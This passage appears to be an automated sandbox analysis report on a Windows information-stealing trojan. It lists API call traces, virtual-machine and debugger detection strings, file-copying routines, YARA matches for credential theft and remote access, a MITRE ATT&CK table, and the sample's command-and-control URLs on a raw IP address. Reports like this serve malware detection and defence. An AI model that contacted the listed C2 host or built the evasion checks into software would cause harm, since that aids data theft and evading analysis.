                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0084BE4D pushfd ; iretd 0_2_0084BE50
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B4B29C push ecx; ret 0_2_00B4B2AF
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B30F59 pushfd ; iretd 0_2_00B31078
                      Source: 1vYjXDbKHt.exeStatic PE information: section name: .text entropy: 7.4896031125195375
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26480
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeEvaded block: after key decisiongraph_0-27641
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeAPI coverage: 6.5 %
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B3DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00B3DCE7
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B3C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00B3C0D7
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B3E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B3E077
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B31937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B31937
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B3F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B3F917
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B44107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00B44107
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B3E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00B3E697
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B3EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00B3EF87
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B447D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00B447D7
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B43B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00B43B17
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B44B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B44B77
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                      Source: Amcache.hve.5.drBinary or memory string: VMware
                      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                      Source: 1vYjXDbKHt.exe, 00000000.00000002.2280002134.0000000000874000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareo}
                      Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                      Source: 1vYjXDbKHt.exe, 00000000.00000002.2280002134.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, 1vYjXDbKHt.exe, 00000000.00000002.2280002134.0000000000891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: 1vYjXDbKHt.exe, 00000000.00000002.2280002134.0000000000874000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeAPI call chain: ExitProcess graph end nodegraph_0-26468
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeAPI call chain: ExitProcess graph end nodegraph_0-26307
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeAPI call chain: ExitProcess graph end nodegraph_0-26487
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeAPI call chain: ExitProcess graph end nodegraph_0-26353
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeAPI call chain: ExitProcess graph end nodegraph_0-26465
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeAPI call chain: ExitProcess graph end nodegraph_0-26479
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeAPI call chain: ExitProcess graph end nodegraph_0-26508
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0084AC23 push dword ptr fs:[00000030h]0_2_0084AC23
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B499B7 mov eax, dword ptr fs:[00000030h]0_2_00B499B7
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B30D90 mov eax, dword ptr fs:[00000030h]0_2_00B30D90
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B3092B mov eax, dword ptr fs:[00000030h]0_2_00B3092B
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B4B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B4B5A1
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B4D151 SetUnhandledExceptionFilter,0_2_00B4D151
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B4AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B4AFAF
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: 1vYjXDbKHt.exe PID: 5000, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00B49867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00B49867
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00B47DF7
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\1vYjXDbKHt.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                      Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                      Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.3.1vYjXDbKHt.exe.2350000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.1vYjXDbKHt.exe.2350000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1vYjXDbKHt.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1vYjXDbKHt.exe.b30e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1vYjXDbKHt.exe.b30e67.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1vYjXDbKHt.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2280002134.0000000000874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2201257818.0000000002350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1vYjXDbKHt.exe PID: 5000, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.3.1vYjXDbKHt.exe.2350000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.1vYjXDbKHt.exe.2350000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1vYjXDbKHt.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1vYjXDbKHt.exe.b30e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1vYjXDbKHt.exe.b30e67.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1vYjXDbKHt.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2280002134.0000000000874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2201257818.0000000002350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1vYjXDbKHt.exe PID: 5000, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Native API
                      1
                      DLL Side-Loading
                      11
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote ServicesData from Local System1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Virtualization/Sandbox Evasion
                      LSASS Memory31
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable Media2
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                      Disable or Modify Tools
                      Security Account Manager1
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive3
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection
                      NTDS11
                      Process Discovery
                      Distributed Component Object ModelInput Capture13
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      Account Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information
                      Cached Domain Credentials1
                      System Owner/User Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                      Software Packing
                      DCSync1
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc Filesystem123
                      System Information Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      1vYjXDbKHt.exe47%ReversingLabsWin32.Trojan.Generic
                      1vYjXDbKHt.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://upx.sf.net0%URL Reputationsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      198.187.3.20.in-addr.arpa
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://62.204.41.177/edd20096ecef326d.phptrue
                          unknown
                          http://62.204.41.177/true
                            unknown
